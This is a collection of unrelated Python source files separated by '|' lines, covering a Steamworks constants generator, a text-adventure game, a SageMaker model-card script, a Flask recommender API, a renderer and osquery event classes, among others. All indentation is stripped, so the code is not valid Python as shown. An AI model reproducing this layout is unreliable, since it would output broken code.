#public const int k_uCellIDInvalid = 0xFFFFFFFF;
#public const int k_uPartnerIdInvalid = 0;
)
g_SkippedTypedefs = (
"uint8",
"int8",
"int32",
"uint32",
"int64",
"uint64",
)
g_CustomDefines = {
# "Name": ("Type", "Value"),
"MASTERSERVERUPDATERPORT_USEGAMESOCKETSHARE": ("ushort", "0xFFFF"),
"k_nMaxLobbyKeyLength": ("byte", None),
"STEAM_CONTROLLER_HANDLE_ALL_CONTROLLERS": ("ulong", "0xFFFFFFFFFFFFFFFF"),
"STEAM_CONTROLLER_MIN_ANALOG_ACTION_DATA": ("float", "-1.0f"),
"STEAM_CONTROLLER_MAX_ANALOG_ACTION_DATA": ("float", "1.0f"),
"STEAM_INPUT_HANDLE_ALL_CONTROLLERS": ("ulong", "0xFFFFFFFFFFFFFFFF"),
"STEAM_INPUT_MIN_ANALOG_ACTION_DATA": ("float", "-1.0f"),
"STEAM_INPUT_MAX_ANALOG_ACTION_DATA": ("float", "1.0f"),
}
def main(parser):
try:
os.makedirs("autogen/")
except OSError:
pass
lines = []
constants = parse(parser)
for constant in constants:
for precomment in constant.precomments:
lines.append("//" + precomment)
lines.append("public const " + constant.type + " " + constant.name + constant.spacing + "= " + constant.value + ";" + constant.comment)
with open("autogen/SteamConstants.cs", "wb") as out:
with open("templates/header.txt", "r") as f:
out.write(bytes(f.read(), "utf-8"))
out.write(bytes("namespace Steamworks {\n", "utf-8"))
out.write(bytes("\tpublic static class Constants {\n", "utf-8"))
for line in lines:
out.write(bytes("\t\t" + line + "\n", "utf-8"))
out.write(bytes("\t}\n", "utf-8"))
out.write(bytes("}\n\n", "utf-8"))
out.write(bytes("#endif // !DISABLESTEAMWORKS\n", "utf-8"))
def parse(parser):
interfaceversions, defines = parse_defines(parser)
constants = parse_constants(parser)
return interfaceversions + constants + defines
def parse_defines(parser):
out_defines = []
out_interfaceversions = []
for f in parser.files:
for d in f.defines:
if d.name in g_SkippedDefines:
continue
comment = ""
if d.c.linecomment:
comment = " //" + d.c.linecomment
definetype = "int"
definevalue = d.value
customdefine = g_CustomDefines.get(d.name, False)
if customdefine:
if customdefine[0]:
definetype = customdefine[0]
if customdefine[1]:
definevalue = customdefine[1]
elif d.value.startswith('"'):
definetype = "string"
if d.name.startswith("STEAM"):
out_interfaceversions.append(InternalConstant(d.name, definevalue, definetype, d.c.precomments, comment, " "))
continue
out_defines.append(InternalConstant(d.name, definevalue, definetype, d.c.precomments, comment, d.spacing))
return (out_interfaceversions, out_defines)
def parse_constants(parser):
out_constants = []
for f in parser.files:
for constant in f.constants:
if constant.name in g_SkippedConstants:
continue
comment = ""
if constant.c.linecomment:
comment = " //" + constant.c.linecomment
constanttype = constant.type
for t in parser.typedefs:
if t.name in g_SkippedTypedefs:
continue
if t.name == constant.type:
constanttype = t.type
break
constanttype = g_TypeDict.get(constanttype, constanttype)
constantvalue = constant.value
if constantvalue == "0xFFFFFFFF":
constantvalue = "-1"
elif constantvalue == "0xffffffffffffffffull":
constantvalue = constantvalue[:-3]
out_constants.append(InternalConstant(constant.name, constantvalue, constanttype, constant.c.precomments, comment, " "))
return out_constants
if __name__ == "__main__":
if len(sys.argv) != 2:
print("TODO: Usage Instructions")
exit()
steamworksparser.Settings.fake_gameserver_interfaces = True
main(steamworksparser.parse(sys.argv[1]))
|
x = int(input('Enter the number: \t'))
if x%2==0:
if x%3==0:
print("Number is divisible by 2 and 3")
else:
print("Number is divisible by 2 only")
print("x%3= ", x%3)
elif x%3==0:
print("Number is divisible by 3 only")
else:
print("Number is not divisible by 2 and 3")
print("x%2= ", x%2)
print("x%3= ", x%3)
print("Thank you")
|
import json, time, random
def main():
# TODO: allow them to choose from multiple JSON files?
with open('spooky_mansion.json') as fp:
game = json.load(fp)
print_instructions()
print("You are about to play '{}'! Good luck!".format(game['__metadata__']['title']))
print("")
play(game)
def play(rooms):
# Where are we? Look in __metadata__ for the room we should start in first.
current_place = rooms['__metadata__']['start']
# The things the player has collected.
stuff = ['Cell Phone; no signal or battery...']
start_time = time.time()
cat_fed = False
cat_loc = random.choice(list(rooms))
while True:
print("")
print("")
# Figure out what room we're in -- current_place is a name.
here = rooms[current_place]
# Print the description.
print(here["description"])
if len(here["items"]) > 0:
print("For the taking:")
for i in range(len(here["items"])):
print(" - ", here["items"][i])
# TODO: print any available items in the room...
# e.g., There is a Mansion Key.
# Is this a game-over?
if here.get("ends_game", False):
end_time = time.time()
break
if cat_fed == False:
if cat_loc == current_place:
if "Canned Tuna" in here["items"]:
print("You open the canned tuna and place it on the floor. The cat is overjoyed!")
here["items"].remove("Canned Tuna")
print("...")
print("The cat raises its head, revealing a large key around its collar. You got a mansion key!")
stuff.append("Mansion Key")
cat_fed = True
continue
if "Canned Tuna" in stuff:
print("A small black cat wanders into the room and starts puring at your feet. It must smell the fish!")
else:
print("A small black cat wanders around the room. It looks hungry.")
# Allow the user to choose an exit:
usable_exits,missing_key = find_usable_exits(here, stuff)
# Print out numbers for them to choose:
for i, exit in enumerate(usable_exits):
print(" {}. {}".format(i+1, exit['description']))
# See what they typed:
action = input("> ").lower().strip()
# If they type any variant of quit; exit the game.
if action in ["quit", "escape", "exit", "q"]:
print("You quit.")
break
if action == "help":
print_instructions()
continue
if action == "cat":
cat_loc = "basement"
continue
if action == "stuff":
print("You have:")
if len(stuff) == 0:
print(" - Nothing...")
else:
for i in range(len(stuff)):
print(" - ", stuff[i])
continue
if action == "take":
print("You took: ")
for i in range(len(here["items"])):
print(" - ", here["items"][i])
stuff.append(here["items"][i])
here["items"].clear()
continue
if action == "drop":
print("What will you drop?")
for i in range(len(stuff)):
print(" {}. {}".format(i+1, stuff[i]))
dropselect = input("> ").lower().strip()
itemdrop = int(dropselect) - 1
here["items"].append(stuff[itemdrop])
stuff.remove(stuff[itemdrop])
continue
if action == "search":
found_hidden = False
for exit in here["exits"]:
hidden = exit.get("hidden")
if hidden == True:
exit['hidden'] = False
print("Your search is fruitful!")
found_hidden = True
if found_hidden == False:
print("You search high and low to no avail...")
continue
# TODO: if they type "stuff", print any items they have (check the stuff list!)
# TODO: if they type "take", grab any items in the room.
# TODO: if they type "search", or "find", look through any exits in the room that might be hidden, and make them not hidden anymore!
# Try to turn their action into an exit, by number.
try:
num = int(action) - 1
selected = usable_exits[num]
if selected in missing_key:
print("This exit is locked. You must find the key.")
else:
current_place = selected['destination']
cat_loc = random.choice(list(rooms))
print("...")
except:
print("I don't understand '{}'...".format(action))
print("")
print("You finished in", int(end_time - start_time), "seconds.")
print("")
print("=== GAME OVER ===")
def find_usable_exits(room, stuff):
"""
Given a room, and the player's stuff, find a list of exits that they can use right now.
That means the exits must not be hidden, and if they require a key, the player has it.
RETURNS
- a list of exits that are visible (not hidden) and don't require a key!
"""
usable = []
missing_key = []
for exit in room['exits']:
if exit.get("hidden", False):
continue
if "required_key" in exit:
if exit["required_key"] in stuff:
usable.append(exit)
continue
else:
missing_key.append(exit)
usable.append(exit)
continue
continue
usable.append(exit)
return usable, missing_key
def print_instructions():
print("=== Instructions ===")
print(" - Type a number to select an exit.")
print(" - Type 'stuff' to see what you're carrying.")
print(" - Type 'take' to pick up an item.")
print(" - Type 'quit' to exit the game.")
print(" - Type 'search' to take a deeper look at a room.")
print(" - Type 'help' to view instructions again.")
print("=== Instructions ===")
print("")
if __name__ == '__main__':
main()
|
"""Proof-of-concept for model card integration in SageMaker Pipelines"""
import logging
import tempfile
import urllib
from pathlib import Path
from datetime import datetime
import dataclasses
from typing import List, Text, Union, Optional
import json
import base64
import boto3
import jinja2
# lots of model card tutorial stuff gets skipped here because we add
# custom names to the model card schema, while, e.g. `mtc.export_format`
# method has the top-level names hardcoded into the method definition
import model_card_toolkit
logging.getLogger().setLevel(logging.INFO)
BASE_DIR = Path("/opt/ml/processing").resolve()
EVAL_REPORT_DIR = BASE_DIR/"evaluation"
EVAL_IMAGES_DIR = BASE_DIR/"eval_images"
JINJA_TEMPLATE_URI = ("https://raw.githubusercontent.com/"
"solita/mlops-pipeline-sagemaker/"
"main/templates/model_card.html.jinja")
OUTPUT_DIR = BASE_DIR/"model_card"
# TODO: if putting this into its own step, we'll need to find the
# current execution ARN (pipelines have concurrency so checking on status
# won't cut it). The only way I can see so far is to inject a fingerprint
# into, e.g. evaluation report and then match on fingerprints of all running
# pipelines. This should introduce a couple of extra S3 calls but that's
# alright as time is negligible in the overall pipeline exec time.
# ... for now, take the oldest running pipeline
@dataclasses.dataclass
class OperationalSetting:
"""Operational setting of the pipeline.
Attributes:
type: A short name / description of the pipeline setting
value: Value used in the pipeline execution
"""
type: Text
value: Union[int, float, Text]
confidence_interval: Optional[model_card_toolkit.ConfidenceInterval] = None
threshold: Optional[float] = None
slice: Optional[Text] = None
@dataclasses.dataclass
class PipelineSettings:
"""Parameters of pipeline's execution run.
Attributes:
pipeline_parameters: List of pipeline parameter values.
"""
pipeline_parameters: List[OperationalSetting] = dataclasses.field(
default_factory=list)
def _fetch_def_parval(parsed_json, parname):
matches = [p['DefaultValue'] for p in parsed_json['Parameters']
if p['Name'] == parname]
return matches[0] if matches else None
@dataclasses.dataclass
class PipelineModelCard(model_card_toolkit.ModelCard):
"""
pipeline_settings: Operational settings for the pipeline run.
"""
__doc__ += model_card_toolkit.ModelCard.__doc__
pipeline_settings: PipelineSettings = dataclasses.field(
default_factory=PipelineSettings)
pipeline_name = "BittiPipeline"
sensitive_data = False
region_name = "eu-central-1"
session = boto3.session.Session()
client_sagemaker = session.client(
service_name='sagemaker',
region_name=region_name
)
pipe_executions = client_sagemaker.list_pipeline_executions(
PipelineName=pipeline_name)
current_date = datetime.now(tz=datetime.now().astimezone().tzinfo)
last_exec, last_start_time, last_exec_arn = None, current_date, None
for exec_dict in pipe_executions['PipelineExecutionSummaries']:
if (exec_dict['PipelineExecutionStatus'] == 'Executing'
and exec_dict['StartTime'] < last_start_time):
last_exec_arn = exec_dict['PipelineExecutionArn']
last_start_time = exec_dict['StartTime']
last_exec = exec_dict['PipelineExecutionDisplayName']
last_description = exec_dict['PipelineExecutionDescription']
if not last_exec:
raise RuntimeError("Can't figure out which pipeline execution this"
" pipeline step is running in!")
logging.info("Selected pipeline run: %s", last_exec)
logging.info("Selected pipeline arn: %s", last_exec_arn)
logging.info("Selected pipeline ran: %s", last_start_time)
pipe_details = client_sagemaker.describe_pipeline_definition_for_execution(
PipelineExecutionArn=last_exec_arn)
pipe_definition = json.loads(pipe_details["PipelineDefinition"])
step_dict = {p['Name']: p for p in pipe_definition['Steps']}
logging.info("Pipeline definition: %s", pipe_details["PipelineDefinition"])
train_test_split = _fetch_def_parval(pipe_definition, 'TrainTestSplit')
s3_input_data = _fetch_def_parval(pipe_definition, 'InputData')
training_batch_size = _fetch_def_parval(pipe_definition, 'TrainingBatchSize')
training_instance_type = _fetch_def_parval(pipe_definition,
'TrainingInstanceType')
max_iterations = _fetch_def_parval(pipe_definition, 'MaxIterations')
model_approval_map_cut = _fetch_def_parval(pipe_definition,
'ModelApprovalmAPThreshold')
with open(EVAL_REPORT_DIR/"evaluation.json", "r") as fin:
eval_data = json.load(fin)
mAP = model_card_toolkit.PerformanceMetric(
type='Mean average precision (mAP) score',
value=f"{eval_data['regression_metrics']['mAP']['value']*100:.2f}%")
# TODO: some of the values below can be obtained from .mlmodel file
# metadata. But for that I'll need to include coremltools alongside
# the model-card-toolkit - still have to check for compatible versions.
# TODO: the rest of the - very voluminous! - descriptions should be migrated
# into the .ini file and used as pipeline parameters perhaps?
model_card = PipelineModelCard()
model_card.model_details.name = pipeline_name
model_card.model_details.overview = (
"This is an explainability report supplementing a magazine logo"
" detector neural network model. This model card is generated"
" automatically as part of the AWS SageMaker Pipelines execution run"
f" (version '{last_exec}') that trained the accompanying model"
" version. The pipeline took the input training images and"
" annotations (available for Solita's internal use at"
f" {s3_input_data}), augmented each image/label pair with a hundred"
" random rotation and projection transformation, and fed the resulting"
" data, split into training and evaluation set, into the training"
" script. The training, executed as a SageMaker Training Job with a"
f" custom Turi Create ECR image, achieved a mAP score of {mAP.value} on"
" BITTI magazine labels. After cross-checking with the mAP cutoff of"
f" {model_approval_map_cut*100:.2f}%, the model card generator step of"
" the pipeline created this HTML file and deployed it as a"
" publicly available static webpage.")
model_card.model_details.owners = [
model_card_toolkit.Owner("Solita Oy", "AIGA WP3 working group"),
model_card_toolkit.Owner("Vlas Sokolov", "vlas.sokolov@solita.fi")]
model_card.model_details.version.name = last_exec
model_card.model_details.version.date = str(last_start_time)
model_card.model_details.version.diff = last_description
model_card.model_details.license = "MIT License"
s3_train_data = step_dict['BittiDataProcessing']['Arguments'][
'ProcessingOutputConfig']['Outputs'][0]['S3Output']['S3Uri']
mct_data = model_card.model_parameters.data
mct_data.train.link = s3_train_data
mct_data.train.sensitive = sensitive_data
mct_data.train.name = (
f"Bitti training data ({train_test_split*100:.1f}% split)")
s3_test_data = step_dict['BittiDataProcessing']['Arguments'][
'ProcessingOutputConfig']['Outputs'][1]['S3Output']['S3Uri']
mct_data.eval.link = s3_test_data
mct_data.eval.sensitive = sensitive_data
mct_data.eval.name = (
f"Bitti evaluation data ({(1-train_test_split)*100:.1f}% split)")
# add evaluation example graphics
mct_data.eval.graphics.description = (
"The images below show the model performance on the evaluation set."
" The randomly chosen images and overlaid with model predictions.")
mct_data.eval.graphics.collection = []
for i, img_path in enumerate(EVAL_IMAGES_DIR.glob("*")):
with open(img_path, "rb") as image_file:
img_str_base64 = base64.b64encode(image_file.read())
graphic = model_card_toolkit.Graphic(name=f"Evaluation image #{i+1}",
image=img_str_base64.decode())
mct_data.eval.graphics.collection.append(graphic)
map_threshold = _fetch_def_parval(pipe_definition, 'ModelApprovalmAPThreshold')
mct_data.input = model_card_toolkit.Dataset(
name="input", link=s3_input_data, sensitive=sensitive_data)
mct_data.augmented = model_card_toolkit.Dataset(
name="augmented", sensitive=sensitive_data,
link=step_dict['DataAugmentation']['Arguments'][
'ProcessingOutputConfig']['Outputs'][0]['S3Output']['S3Uri'])
turicreate_object_detection_uri = (
"https://github.com/apple/turicreate/blob/"
"master/userguide/object_detection/how-it-works.md")
# the model arch section has a {{ value | safe }} in the template
model_card.model_parameters.model_architecture = (
"TinyYOLO re-implemneted in turicreate. Extensive writeup"
" about the turicreate implementation can be found"
f" here: <a href=\"{turicreate_object_detection_uri}\">"
"How TuriCreate object detection works.</a>")
model_card.quantitative_analysis.performance_metrics.append(mAP)
model_card.pipeline_settings = PipelineSettings()
model_card.pipeline_settings.pipeline_parameters.extend([
OperationalSetting(
type='Fraction of data reserved for training',
value=train_test_split),
OperationalSetting(
type='Training: maximum number of iterations',
value=max_iterations),
OperationalSetting(
type='Training: batch size',
value=training_batch_size),
OperationalSetting(
type='Training: instance type',
value=training_instance_type),
# model_card_toolkit.PerformanceMetric(
OperationalSetting(
type='Model approval mAP threshold',
value=model_approval_map_cut),
])
model_card.considerations.users.append(
"Potential MLOps users looking for a CI/CD template for model deployment."
)
model_card.considerations.users.append(
"iOS developers interested in integrating pipeline-resultant"
" models into iPhone applications."
)
model_card.considerations.users.append(
"iPhone application users who seek to get insights into how the"
" neural network model was created."
)
model_card.considerations.users.append(
"AI explainability enthusiasts and researchers interested in"
" an xAI reference pipeline."
)
model_card.considerations.use_cases.append(
"The provided model is intended to be used as a part of a BITTI"
" magazine logo recognition application."
)
model_card.considerations.use_cases.append(
"It was developed for demo purposes, and was not intended to achieve"
" performance comparable to with state of the art computer vision"
" and deep learning applications."
)
model_card.considerations.limitations.append(
"The model was trained to recognize logos that roughly align with the"
" camera (in about +/- 15 degrees range), tilting the logos beyond"
" that range will likely result in degraded performance."
)
model_card.considerations.limitations.append(
"The model was trained to recognize logos with minimal projection"
" distortion. Using it on an image that was, for example, taken from"
" the side, will often not give desirable results."
)
model_card.considerations.limitations.append(
"Far away, blurry, obscured, over- or under-exposed magazine logo"
" images affect model performance negatively."
)
model_card.considerations.tradeoffs.append(
"The architecture chosen for the model was designed to process"
" smartphone camera videos in real-time. As only a limited processing"
" power is expected to be available, the trained model is relatively"
" lightweight. This, in turn, means that the model is not capable of"
" competing with state-of-the-art object detection architectures"
" of larger size."
)
model_card.considerations.tradeoffs.append(
"While other magazine labels can be learned from the same training set,"
" the developers chose not to label them in the training dataset due"
" to time constraints."
)
model_card.considerations.ethical_considerations = [
model_card_toolkit.Risk(
name=(
"As the magazine images are in public domain, there are few"
" ethical considerations the model developers can think of."
" However, potential model users or applications that take, e.g.,"
" magazine rack images in a store should be wary of accidentally"
" recording or leaking sensitive data such as people imagery or"
" store pricing/stock information."),
mitigation_strategy=(
"As the model is fully capable to run on an edge device such as a"
" mobile phone, a mitigation strategy for the issue above is to"
" limit the data storage to that of a local device."))]
# fetch the jinja template and generate the model card
mc_json = json.loads(model_card.to_json())
with tempfile.NamedTemporaryFile() as tmp:
urllib.request.urlretrieve(JINJA_TEMPLATE_URI, tmp.name)
temp_path = Path(tmp.name).resolve()
jinja_env = jinja2.Environment(
loader=jinja2.FileSystemLoader(temp_path.parent),
autoescape=True, auto_reload=True, cache_size=0)
template = jinja_env.get_template(temp_path.name)
model_card_html = template.render(
model_details=mc_json['model_details'],
model_parameters=mc_json.get('model_parameters', {}),
quantitative_analysis=mc_json.get('quantitative_analysis', {}),
pipeline_settings=mc_json.get('pipeline_settings', {}),
considerations=mc_json.get('considerations', {}))
logging.info("Created a model card HTML, saving to %s", OUTPUT_DIR)
with open(OUTPUT_DIR/"model_card.html", "w") as fout_html:
fout_html.write(model_card_html)
with open(OUTPUT_DIR/"model_card.json", "w") as fout_json:
json.dump(mc_json, fout_json)
|
from drawable_element import DrawableElement
from education_item import EducationItem
class Education(DrawableElement):
# constants
BASE_Y_OFFSET = 3090
MAX_WIDTH = 1660
MIN_X_SPACING = 35
CONTENT_Y_SPACING = 70
def __init__(self, data, cv):
super().__init__(cv)
self.edu_header = data["edu_header"]
self.items = data["items"][:2]
def draw(self):
if not self.items: return
header_coords = (self.cv.MARGIN + self.cv.HEADER_INDENT, self.BASE_Y_OFFSET)
self.cv.im_draw.text(header_coords, self.edu_header, self.cv.WHITE_3CH, font=self.cv.h_font)
header_size = self.cv.im_draw.textsize(self.edu_header, font=self.cv.h_font)
edu1_coords = (self.cv.MARGIN, self.BASE_Y_OFFSET + header_size[1] + self.CONTENT_Y_SPACING)
edu1 = EducationItem(self.items[0], self.cv)
edu1.draw()
self.cv.im.paste(edu1.im, edu1_coords)
if len(self.items) < 2: return
edu2 = EducationItem(self.items[1], self.cv)
edu2.draw()
x_margin = max((self.MAX_WIDTH - edu1.im.size[0] - edu2.im.size[0]) // 2, self.MIN_X_SPACING)
self.cv.im.paste(edu2.im, (edu1_coords[0] + edu1.im.size[0] + x_margin, edu1_coords[1]))
|
import bottle
from os import path
STATIC_FOLDER = path.join(path.dirname(__file__), 'public')
ALLOW_TYPES = ['html', 'js', 'css', 'png', 'jpg', 'ico', 'webp']
app = bottle.Bottle()
# single page app
@app.route('/')
@app.route('/index.html')
def index():
return bottle.static_file('index.html', root = STATIC_FOLDER)
# static files
@app.route(f'/<path:re:.*\\.({"|".join(ALLOW_TYPES)})>')
def static(path):
return bottle.static_file(path, root = STATIC_FOLDER)
if __name__ == "__main__":
app.run(host='127.0.0.1', port=8080)
|
import pygtk
pygtk.require('2.0')
import gtk
from pyshorteners.shorteners import Shortener
# get the clipboard
clipboard = gtk.clipboard_get()
#read clipboard for the text copied
url_original = clipboard.wait_for_text()
try:
shortener = Shortener('TinyurlShortener')
url = format(shortener.short(url_original))
# set the clipboard data as shortened url
clipboard.set_text(url)
except:
clipboard.set_text(url_original)
# Storing short url to clipboard
clipboard.store()
|
version https://git-lfs.github.com/spec/v1
oid sha256:5273b67e29f8efd017f0e9242282d3ec90d2b8355f528e3a195ca5d8b5cfbbbd
size 3303
|
# Celery task status
STATUS_PENDING = "PENDING"
STATUS_RUNNING = "RUNNING"
STATUS_SUCCESS = "SUCCESS"
STATUS_FAILURE = "FAILURE"
# Keys lookup status strings.
KEYS_STATUS_SUCCESS = "success"
KEYS_STATUS_FAIL = "fail"
KEYS_STATUS_NOMATCH = "nomatch"
|
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/010_UK.ipynb (unless otherwise specified).
__all__ = ['LAST_MODIFIED']
# Cell
from ..imports import *
from ..core import *
import openpyxl
# Cell
LAST_MODIFIED = datetime.date.today()
|
import requests
import json
from flask import Blueprint, request, jsonify, render_template, Flask
from flask_cors import CORS, cross_origin
import pandas as pd
import re
import os
# *************************************************************************** #
# ML Engineers imports. Must be formated like this or else pickled model won't
# work
from sklearn.feature_extraction import text
# TFIDF / Word Embeddings
from sklearn.feature_extraction.text import TfidfVectorizer
# Similarity
from sklearn.neighbors import NearestNeighbors
# Deployment
import pickle
# *************************************************************************** #
# Activating CORS
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
# *************************************************************************** #
from_back_routes = Blueprint("from_back_routes", __name__)
DF_FEATURES = ['Strain', 'Type', 'Effects', "Flavor", 'Description']
def clean_payload(pay_load):
'''
Quick helper function for cleaning the payload
'''
input_strain = pd.DataFrame.from_records(pay_load, index=[0], columns=[
'UserID', 'Strain', 'Type', 'Effects', 'Flavor', 'Description'])
for each in DF_FEATURES:
input_strain[each] = input_strain[each].apply(lambda x: x.lower())
input_strain[each] = input_strain[each].apply(
lambda x: re.sub('[^a-zA-Z 0-9]', ' ', x))
# Combines text
input_strain['combined_text'] = input_strain['Type'] + ' ' + input_strain['Effects'] + \
' ' + input_strain['Flavor'] + input_strain['Description'] + ' '
return input_strain
def safe_paths():
'''
Quick helper to make platfor independant file paths
Returns - (vectorizer, df, dtm)
'''
model_path = os.path.join('models',
'pickled_model.pkl')
df_path = os.path.join('models',
'pickled_df.pkl')
vect_path = os.path.join('models',
'pickled_vect.pkl')
return (model_path, df_path, vect_path)
def load_models():
'''
Helper function for loading pickled models
'''
model_path, df_path, vect_path = safe_paths()
# load the model from disk
pickled_model = pickle.load(open(model_path, 'rb'))
strain_list = pd.read_pickle(df_path)
pickled_vect = pickle.load(open(vect_path, 'rb'))
return (pickled_model, strain_list, pickled_vect)
# *************************************************************************** #
# Loading the pickled models in global memory, to increase response time of api
PICKLED_MODEL, STRAIN_LIST, PICKLED_VECT = load_models()
# *************************************************************************** #
def find_rec_strains(p_strain):
"""
This function takes in a preprocessed JSON from preprocess_strain(strain).
It creates a JSON containing info on the 5 most similar strains
"""
# Transforms preprocessed strain
trans_strain = PICKLED_VECT.transform(
p_strain['combined_text'])
trans_strain = trans_strain.todense()
# Predit KNN for strain strains
pred_strains = PICKLED_MODEL.kneighbors(trans_strain)
# Grab top 5 results that are most similar to user inputted strain
recs = []
for each in pred_strains[1][0]:
temp = STRAIN_LIST.iloc[each]
recs.append(temp)
recs = pd.DataFrame(recs).iloc[0].to_json()
print('Created predicted_recs.json')
return recs
def clean_response(recs, userID):
features = DF_FEATURES.copy()
features.insert(0, 'UserID')
temp = json.loads(recs)
temp['UserID'] = userID
cleaned = {}
for f in features:
cleaned[f] = temp[f]
return cleaned
@from_back_routes.route('/send', methods = ["POST"])
@cross_origin()
def parse_json():
print('Fetching payload')
pyld = request.get_json()
print('Preprocessing payload')
preprocessed = clean_payload(pyld)
print('Processing payload')
recs = find_rec_strains(preprocessed)
print('Preparing response')
clean_recs = clean_response(recs, pyld['UserID'])
print('Sending response')
response = app.response_class(
json.dumps(clean_recs, sort_keys=False, indent=4),
mimetype=app.config['JSONIFY_MIMETYPE']
)
return response
@from_back_routes.route('/json')
def parse_json2():
backend_url1 = f"https://raw.githubusercontent.com/jae-finger/med_cabinet_4/master/test_strain.json"
response1 = requests.get(backend_url1)
res_text = response1.text
parsed_response1 = json.loads(res_text)
return jsonify(parsed_response1)
@from_back_routes.route('/')
def land_page():
return render_template("index.html", message="A datascience API for serving up cannabis strains to a webdev team")
@from_back_routes.route('/references')
def refer_page():
return render_template("references.html", message="A datascience API for serving up cannabis strains to a webdev team")
|
import numpy as np
import pyrender
import trimesh
import math
from pyrender.constants import RenderFlags
import config
class Renderer:
"""
Renderer used for visualizing the SMPL model
Code adapted from https://github.com/vchoutas/smplify-x
"""
def __init__(self, faces, img_res=512):
self.renderer = pyrender.OffscreenRenderer(viewport_width=img_res,
viewport_height=img_res,
point_size=1.0)
self.camera_center = [img_res // 2, img_res // 2]
self.faces = faces
self.img_res = img_res
# set the scene
self.scene = pyrender.Scene(bg_color=[0.0, 0.0, 0.0, 0.0],
ambient_light=(0.3, 0.3, 0.3))
light = pyrender.PointLight(color=[1.0, 1.0, 1.0], intensity=1.)
light_pose = np.eye(4)
light_pose[:3, 3] = [0, -1, 1]
self.scene.add(light, pose=light_pose)
light_pose[:3, 3] = [0, 1, 1]
self.scene.add(light, pose=light_pose)
# light_pose[:3, 3] = [1, 1, 2]
# self.scene.add(light, pose=light_pose)
def __call__(self, verts, cam_trans, img=None, angle=None, axis=None, mesh_filename=None,
color=[0.8, 0.3, 0.3], return_mask=False):
mesh = trimesh.Trimesh(verts, self.faces, process=False)
Rx = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])
mesh.apply_transform(Rx)
cam_trans[0] *= -1.
if angle and axis:
# Apply given mesh rotation to the mesh - useful for rendering from different views
R = trimesh.transformations.rotation_matrix(math.radians(angle), axis)
mesh.apply_transform(R)
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.2,
alphaMode='OPAQUE',
baseColorFactor=(color[0], color[1], color[2], 1.0))
mesh = pyrender.Mesh.from_trimesh(mesh, material=material)
mesh_node = self.scene.add(mesh, 'mesh')
camera_pose = np.eye(4)
camera_pose[:3, 3] = cam_trans
camera = pyrender.IntrinsicsCamera(fx=config.FOCAL_LENGTH, fy=config.FOCAL_LENGTH,
cx=self.camera_center[0], cy=self.camera_center[1])
cam_node = self.scene.add(camera, pose=camera_pose)
rgb, rend_depth = self.renderer.render(self.scene, flags=RenderFlags.RGBA)
valid_mask = (rend_depth > 0)
if return_mask:
return valid_mask
else:
if img is None:
img = np.zeros((self.img_res, self.img_res, 3))
valid_mask = valid_mask[:, :, None]
output_img = rgb[:, :, :-1] * valid_mask + (1 - valid_mask) * img
image = output_img.astype(np.uint8)
self.scene.remove_node(mesh_node)
self.scene.remove_node(cam_node)
return image
|
from leapp.actors import Actor
from leapp.libraries.actor import reportsettargetrelease
from leapp.models import Report
from leapp.tags import IPUWorkflowTag, TargetTransactionChecksPhaseTag
class ReportSetTargetRelease(Actor):
"""
Reports information related to the release set in the subscription-manager after the upgrade.
When using Red Hat subscription-manager (RHSM), the release is set by default
to the target version release. In case of skip of the RHSM (--no-rhsm), the
release stay as it was on the source RHEL major version and user has to handle
it manually aftervthe upgrade.
"""
name = 'report_set_target_release'
consumes = ()
produces = (Report,)
tags = (IPUWorkflowTag, TargetTransactionChecksPhaseTag)
def process(self):
reportsettargetrelease.process()
|
from datetime import datetime
import logging
from zentral.core.events.base import BaseEvent, EventMetadata, EventRequest, register_event_type
from zentral.core.queues import queues
logger = logging.getLogger('zentral.contrib.osquery.events')
ALL_EVENTS_SEARCH_DICT = {"tag": "osquery"}
class OsqueryEvent(BaseEvent):
tags = ["osquery"]
class OsqueryEnrollmentEvent(OsqueryEvent):
event_type = "osquery_enrollment"
register_event_type(OsqueryEnrollmentEvent)
class OsqueryRequestEvent(OsqueryEvent):
event_type = "osquery_request"
tags = ['osquery', 'heartbeat']
heartbeat_timeout = 2 * 60
register_event_type(OsqueryRequestEvent)
class OsqueryResultEvent(OsqueryEvent):
event_type = "osquery_result"
def get_notification_context(self, probe):
ctx = super().get_notification_context(probe)
if 'action' in self.payload:
ctx['action'] = self.payload['action']
if 'columns' in self.payload:
ctx['columns'] = self.payload['columns']
query_name = self.payload.get("name")
if query_name:
try:
ctx['query'] = probe.scheduled_queries[query_name]
except AttributeError:
# not a OsqueryResultProbe
pass
except KeyError:
logger.warning("Unknown query %s", query_name)
pass
return ctx
register_event_type(OsqueryResultEvent)
class OsqueryDistributedQueryResultEvent(OsqueryEvent):
event_type = "osquery_distributed_query_result"
payload_aggregations = [
("empty", {"type": "terms", "bucket_number": 2, "label": "Empty?"}),
("error", {"type": "terms", "bucket_number": 2, "label": "Error?"}),
]
register_event_type(OsqueryDistributedQueryResultEvent)
class OsqueryFileCarvingEvent(OsqueryEvent):
event_type = "osquery_file_carving"
register_event_type(OsqueryFileCarvingEvent)
class OsqueryStatusEvent(OsqueryEvent):
event_type = "osquery_status"
register_event_type(OsqueryStatusEvent)
# Audit trail events
class OsqueryPackUpdateEvent(OsqueryEvent):
event_type = "osquery_pack_update"
register_event_type(OsqueryPackUpdateEvent)
class OsqueryPackQueryUpdateEvent(OsqueryEvent):
event_type = "osquery_pack_query_update"
register_event_type(OsqueryPackQueryUpdateEvent)
# Utility functions used by the osquery API views
def post_enrollment_event(msn, user_agent, ip, data):
OsqueryEnrollmentEvent.post_machine_request_payloads(msn, user_agent, ip, [data])
def post_request_event(msn, user_agent, ip, request_type, enrollment):
configuration = enrollment.configuration
data = {"request_type": request_type,
"enrollment": {"pk": enrollment.pk,
"configuration": {"pk": configuration.pk,
"name": configuration.name}}}
OsqueryRequestEvent.post_machine_request_payloads(msn, user_agent, ip, [data])
def post_distributed_query_result(msn, user_agent, ip, payloads):
OsqueryDistributedQueryResultEvent.post_machine_request_payloads(msn, user_agent, ip, payloads)
def post_file_carve_events(msn, user_agent, ip, payloads):
OsqueryFileCarvingEvent.post_machine_request_payloads(msn, user_agent, ip, payloads)
def post_finished_file_carve_session(session_id):
queues.post_raw_event("osquery_finished_file_carve_session",
{"session_id": session_id})
def _get_osquery_log_record_created_at(payload):
return datetime.utcfromtimestamp(float(payload.pop('unixTime')))
